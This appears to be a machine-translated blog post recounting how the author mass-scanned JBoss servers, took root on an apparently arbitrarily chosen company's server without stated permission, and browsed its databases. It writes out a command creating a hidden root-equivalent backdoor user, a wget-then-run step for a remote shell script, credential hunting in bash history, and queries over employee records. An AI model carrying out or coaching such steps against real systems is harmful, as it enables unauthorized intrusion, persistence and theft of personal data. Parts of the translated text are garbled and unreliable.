Remember a tortuous penetration test experience

Yesterday the Jexboss script was integrated into my multithreaded framework, sweeping through the national JBoss and discovering more than 1000 shells.

Tool address in: Https://github.com/Xyntax/POC-T

Randomly took a seemingly large manufacturer, for this intrusion test

Discovery Portal

Get the shell through Jexboss and see the CentOS machine (IP has been coded).

It looks like root, check it out.

Unstable Portal Shell problem

Following the execution of the command, it was found that the shell of the jexboss itself was very unstable. Various issues, including but not limited to the following two serious issues:
-When an interactive command is executed, the program crashes and exits. For example: The cat command will echo normally, but the VI command will cause the shell to exit directly with an error.
-No echo when command error

I'm going to have to make a stable shell.

The attempt of NC

See the system has NC. I wanted to simply use NC to bounce a stable shell back and find that all of the NC commands I submitted were not echoed and couldn't even go to the shell.

The attempt of PY

Abandoned the NC, see if the system has python, the result is still --version not echo, but there are-h

Then I want to use the PY to play a shell back, using this code, found that there is no success, a bit eccentric.

I also executed a simple print, still no echo!

Why?

Here I think about it, if it is because the error is not echo. Then the error should be caused by the code ( ) ‘ " and other special characters in the transmission process has been wrong.

I tested it with a few simple shell codes and confirmed the guesswork:
- ‘ " | > >> & commands that contain special characters cannot be executed. And there is no echo

What does that mean?

This means that I basically cannot execute commands with non-alphabetic characters through this shell!
Cannot use NC, cannot use Python, pipe, redirect all

An attempt to SSH

It seems that the shell is basically useless. Looked at the next process, port, and iptables firewall, found some specific configuration, explained or deployed some security defenses. After I saw Port 22, I turned off the firewall. I create a new user, and then the outside with SSH connection is OK?

So I created a new admin user
useradd -o -u 0 -g 0 -M -d /root -s /bin/bash php

Check it out /etc/passwd no problem, create success!

And then when you modify its password
passwd php

No echo!!!
I remember that the action to change the password is to have the user interact several times. Previously said, the execution of the interactive command is an error exit, did not echo. So it's finished.

General SSH will not allow null password connection, I tried, the results like this.
ssh: connect to host 183.xxx.xxx.xxx port 22: Connection refused

I view the configuration file cat /etc/ssh/sshd_config under SSH
The results are as follows:

# $OpenBSD: sshd_config,v 1.97 2015/08/06 14:53:21 Deraadt Exp $# This is the sshd server system-wide configuration file. See# Sshd_config (5) For more information.# This sshd is compiled with Path=/usr/bin:/bin:/usr/sbin:/sbin# The strategy used for options on the default sshd_config shipped with# OpenSSH is to specify options with their default value where# possible, but leave them commented. uncommented options Override the# Default value.Port2525#AddressFamily any#ListenAddress 0.0.0.0#ListenAddress::

In addition to the configuration file is forbidden in the blank password login, the administrator also changed the default SSH port to 2525, you can

So I add a word in the configuration file, allow blank password login not OK?

However, I cannot use non-alphabetic characters when I write a command! You can't use editor interaction!
VI direct collapse, sed not, echo redirect also not ...

Stable Portal

According to the spicy chicken shell of the flavor, it seems that I am very difficult to write to the system, so the external download code local execution can always, anyway, there is python.

wget xxx.xxx.xxxThis command has no special characters! Should be able to execute

Wrote a script to hang on my server, and then wget from the target machine to local.
When LS comes out, I'll blow it up!

python shell.pybe decisive, see that sh-4.1 out when you know it's done!

Then changed the password I set up the user, external SSH connection, the portal finally stabilized.

Browse the database

Get the stable shell and look at the database.

Try to find the relevant command in the command history:
cat ~/.bash_history |grep sql

The results are as follows, and sure enough.

Effortlessly into the database:

The command line in MySQL was long pro for me.

use information_schemaselect table_name,table_rows from tables where TABLE_SCHEMA = ‘cloudcompany‘ order by table_rows desc;

Administrator table:

are employee data (216 data), take a look:

Pick something useful to look at:

Another table (30W data):

Conclusion

It seems that the database does not have many things. While doing writing the article efficiency is too low, has been working fast four hours, the intranet what do not do, and make loopholes to leave!

Note: This article has blocked all sensitive data, only for technical exchanges, the intrusion event has been submitted cloud vulnerability platform.

Reprint please specify the source, and inform me
Mail: [Email protected]

Remember a tortuous penetration test experience